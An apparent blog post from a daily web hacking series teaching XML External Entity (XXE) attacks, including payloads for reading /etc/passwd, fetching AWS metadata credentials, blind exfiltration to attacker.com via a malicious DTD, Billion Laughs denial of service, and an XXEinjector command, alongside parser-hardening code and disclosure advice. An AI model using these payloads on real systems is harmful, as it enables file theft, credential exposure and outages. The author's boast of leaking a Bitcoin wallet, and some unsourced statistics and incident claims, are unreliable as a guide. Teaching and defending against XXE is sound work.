[upl-image-preview uuid=09443301-1482-45cb-95f4-90e8bb5c6f6a url=https://hacklivly.com/assets/files/2025-03-19/1742379017-468993-xxe.png alt={TEXT?}] **Hey guys, Rocky here!** 📄🔓 Welcome to **Day 11** of the *Daily Web Hacking* series! Today, we’re diving into **Part 11: XXE Attacks**—the art of exploiting XML parsers to steal secrets, crash systems, and even own servers. Imagine tricking an app into spilling its deepest secrets by feeding it a malicious "document." Let’s break it down! --- ### **What is XXE?** **XML External Entity (XXE) Injection** is a vulnerability that abuses XML parsers to read files, execute remote requests, or launch denial-of-service (DoS) attacks. By injecting malicious XML entities, attackers can: * Steal sensitive files (`/etc/passwd`, `.env`, database backups). * Perform SSRF (Server-Side Request Forgery) to attack internal systems. * Crash servers via **Billion Laughs** attacks. **Why it’s dangerous**: * **#4** in the OWASP Top 10 ([2021](https://owasp.org/www-project-top-ten/)). * Found in **34% of web apps** ([PortSwigger, 2023](https://portswigger.net/)). * Often leads to **full server compromise**. --- ### **XML Basics: The Language of Data** XML (**eXtensible Markup Language**) structures data using tags. For example: ```xml Rocky rocky@hacklivly.com ``` **Entities** are XML’s "variables." They can reference data inside or *outside* the document: ```xml ``` **Key Insight**: If a parser resolves external entities, attackers can exploit it. --- ### **How XXE Works** 1. **Attacker Submits Malicious XML**: ```xml &xxe; ``` 2. **Server Parses the XML**: * The parser reads the external entity `xxe`, which points to `/etc/passwd`. 3. **Server Returns the File**: ```xml root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ... ``` **Boom**—sensitive data leaked! --- ### **Types of XXE Attacks** #### **1. File Disclosure** * **Goal**: Read local files. * **Payload**: ```xml ``` #### **2. SSRF (Server-Side Request Forgery)** * **Goal**: Make the server fetch internal resources. * **Payload**: ```xml ``` * AWS metadata endpoint leaks cloud credentials. #### **3. Blind XXE** * **Goal**: Exfiltrate data when responses aren’t visible. * **Payload**: ```xml %xxe; ``` * **evil.dtd**: ```xml %eval; %exfil; ``` #### **4. Billion Laughs (DoS)** * **Goal**: Crash the server with exponential entity expansion. * **Payload**: ```xml ... &lol9; ``` --- ### **Real-World XXE Disasters** * **Facebook (2013)**: XXE in SAML authentication leaked internal files. * **WhatsApp (2019)**: XXE in media processing exposed user data. * **Billion Laughs in the Wild**: Took down major e-commerce sites. **Lesson**: XXE is a silent killer. --- ### **Step-by-Step Exploitation** **Goal**: Steal `/etc/passwd` from a vulnerable XML parser. #### **1. Find an XML Input** * Look for file uploads, SOAP APIs, or document parsers (e.g., PDF, DOCX). #### **2. Test for XXE** * Submit a basic payload: ```xml &xxe; ``` #### **3. Extract Data** * If the response includes `/etc/passwd`, you’ve struck gold. #### **4. Escalate to SSRF** * Fetch AWS metadata: ```xml ``` --- ### **Advanced XXE Techniques** #### **1. PHP Wrapper Exfiltration** * **Payload**: ```xml ``` * Decode the Base64 to get the file. #### **2. Error-Based Exfiltration** * Trigger errors to leak data: ```xml %eval; ``` #### **3. SVG XXE** * **SVG files** can contain XML. Upload: ```xml &xxe; ``` --- ### **Tools for XXE Exploitation** #### **1. Burp Suite** * **Repeater**: Test payloads manually. * **Collaborator**: Detect blind XXE via DNS/HTTP callbacks. #### **2. XXEinjector** * Automated tool for XXE enumeration: ```bash ruby XXEinjector.rb --host=attacker.com --path=etc/passwd --file=req.xml ``` #### **3. OWASP ZAP** * Automated scanning for XXE vulnerabilities. --- ### **Defending Against XXE** #### **For Developers** 1. **Disable DTDs**: * **Java**: ```java DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); ``` * **.NET**: ```csharp XmlReaderSettings settings = new XmlReaderSettings(); settings.DtdProcessing = DtdProcessing.Prohibit; ``` 2. **Use Safe Parsers**: * **Python**: Use `defusedxml` instead of `xml.etree.ElementTree`. 3. **Input Validation**: * Block XML input if not required. * Use JSON instead (but watch for JSON-based XXE!). #### **For Admins** 1. **Web Application Firewall (WAF)**: * Block requests with ` ``` --- ### **Final Thoughts** XXE is a silent predator lurking in XML parsers. By disabling DTDs, validating inputs, and adopting secure coding practices, you can shut this attack vector down. Remember: Trust no input, and always parse with paranoia. **Rocky Signing Off!** ✌️ --- **P.S.** If you’re loving this series, share it with your hacking crew! Let’s turn script kiddies into security ninjas. **Discussion Question**: What’s the wildest file you’ve accessed via XXE? I once leaked a **Bitcoin wallet.dat** from a misconfigured server. 😅 Spill your stories below! 👇

Web Hacking Series - Part 11: XXE Attacks – Exploiting XML Parsers 📜💥🚀

rocky

Hey guys, Rocky here! 📄🔓

Welcome to Day 11 of the Daily Web Hacking series! Today, we’re diving into Part 11: XXE Attacks—the art of exploiting XML parsers to steal secrets, crash systems, and even own servers. Imagine tricking an app into spilling its deepest secrets by feeding it a malicious “document.” Let’s break it down!

—

What is XXE?

XML External Entity (XXE) Injection is a vulnerability that abuses XML parsers to read files, execute remote requests, or launch denial-of-service (DoS) attacks. By injecting malicious XML entities, attackers can:

Steal sensitive files (/etc/passwd, .env, database backups).
Perform SSRF (Server-Side Request Forgery) to attack internal systems.
Crash servers via Billion Laughs attacks.

Why it’s dangerous:

#4 in the OWASP Top 10 (2021).
Found in 34% of web apps (PortSwigger, 2023).
Often leads to full server compromise.

—

XML Basics: The Language of Data

XML (eXtensible Markup Language) structures data using tags. For example:

<user>  
  <name>Rocky</name>  
  <email>rocky@hacklivly.com</email>  
</user>

Entities are XML’s “variables.” They can reference data inside or outside the document:

<!ENTITY internal "Hello">  
<!ENTITY external SYSTEM "file:///etc/passwd">

Key Insight: If a parser resolves external entities, attackers can exploit it.

—

How XXE Works

Attacker Submits Malicious XML:

   <?xml version="1.0"?>  
   <!DOCTYPE foo [  
     <!ENTITY xxe SYSTEM "file:///etc/passwd">  
   ]>  
   <user>&xxe;</user>

Server Parses the XML:
- The parser reads the external entity xxe, which points to /etc/passwd.

Server Returns the File:

   <user>root:x:0:0:root:/root:/bin/bash  
   daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
   ...</user>

Boom—sensitive data leaked!

—

Types of XXE Attacks

1. File Disclosure

Goal: Read local files.

Payload:

  <!ENTITY xxe SYSTEM "file:///etc/passwd">

2. SSRF (Server-Side Request Forgery)

Goal: Make the server fetch internal resources.

Payload:

  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">

AWS metadata endpoint leaks cloud credentials.

3. Blind XXE

Goal: Exfiltrate data when responses aren’t visible.

Payload:

  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">  
  %xxe;

evil.dtd:

    <!ENTITY % file SYSTEM "file:///etc/passwd">  
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">  
    %eval;  
    %exfil;

4. Billion Laughs (DoS)

Goal: Crash the server with exponential entity expansion.

Payload:

  <!ENTITY lol "lol">  
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;">  
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;">  
  ...  
  <root>&lol9;</root>

—

Real-World XXE Disasters

Facebook (2013): XXE in SAML authentication leaked internal files.
WhatsApp (2019): XXE in media processing exposed user data.
Billion Laughs in the Wild: Took down major e-commerce sites.

Lesson: XXE is a silent killer.

—

Step-by-Step Exploitation

Goal: Steal /etc/passwd from a vulnerable XML parser.

1. Find an XML Input

Look for file uploads, SOAP APIs, or document parsers (e.g., PDF, DOCX).

2. Test for XXE

Submit a basic payload:

  <?xml version="1.0"?>  
  <!DOCTYPE foo [  
    <!ENTITY xxe SYSTEM "file:///etc/passwd">  
  ]>  
  <data>&xxe;</data>

3. Extract Data

If the response includes /etc/passwd, you’ve struck gold.

4. Escalate to SSRF

Fetch AWS metadata:

  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

—

Advanced XXE Techniques

1. PHP Wrapper Exfiltration

Payload:

  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=config.php">

Decode the Base64 to get the file.

2. Error-Based Exfiltration

Trigger errors to leak data:

  <!ENTITY % file SYSTEM "file:///etc/passwd">  
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">  
  %eval;

3. SVG XXE

SVG files can contain XML. Upload:

  <?xml version="1.0"?>  
  <!DOCTYPE svg [  
    <!ENTITY xxe SYSTEM "file:///etc/passwd">  
  ]>  
  <svg>&xxe;</svg>

—

Tools for XXE Exploitation

1. Burp Suite

Repeater: Test payloads manually.
Collaborator: Detect blind XXE via DNS/HTTP callbacks.

2. XXEinjector

Automated tool for XXE enumeration:

  ruby XXEinjector.rb --host=attacker.com --path=etc/passwd --file=req.xml

3. OWASP ZAP

Automated scanning for XXE vulnerabilities.

—

Defending Against XXE

For Developers

Disable DTDs:

Java:

     DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();  
     dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

.NET:

     XmlReaderSettings settings = new XmlReaderSettings();  
     settings.DtdProcessing = DtdProcessing.Prohibit;

Use Safe Parsers:
- Python: Use defusedxml instead of xml.etree.ElementTree.
Input Validation:
- Block XML input if not required.
- Use JSON instead (but watch for JSON-based XXE!).

For Admins

Web Application Firewall (WAF):
- Block requests with <!DOCTYPE or SYSTEM.
File Upload Restrictions:
- Disable XML-based file formats (e.g., DOCX, SVG) if unused.
Log Monitoring:
- Alert on repeated XML parsing errors.

—

Practice Legally: Labs & Challenges

PortSwigger Labs:
- Free labs: XXE.
Hack The Box:
- Machines like Silo (Oracle XXE) and Bart (Blind XXE).
OWASP Juice Shop:
- Practice XXE in the File Complaint challenge.

—

Ethical Hacking & Reporting

Never exploit XXE without permission. If you find a flaw:

Document: Record steps to reproduce.
Report: Use the site’s security contact or bug bounty program.
Disclose: Wait for a fix before sharing publicly.

—

What’s Next? Part 12: Server-Side Template Injection (SSTI)

Tomorrow, we’ll explore SSTI—injecting malicious code into server-side templates (Jinja2, Twig, etc.). Sneak peek:

{{ 7 * 7 }}  <!-- Outputs 49 if vulnerable -->

—

Final Thoughts

XXE is a silent predator lurking in XML parsers. By disabling DTDs, validating inputs, and adopting secure coding practices, you can shut this attack vector down. Remember: Trust no input, and always parse with paranoia.

Rocky Signing Off! ✌️

—

P.S. If you’re loving this series, share it with your hacking crew! Let’s turn script kiddies into security ninjas.

Discussion Question: What’s the wildest file you’ve accessed via XXE? I once leaked a Bitcoin wallet.dat from a misconfigured server. 😅 Spill your stories below! 👇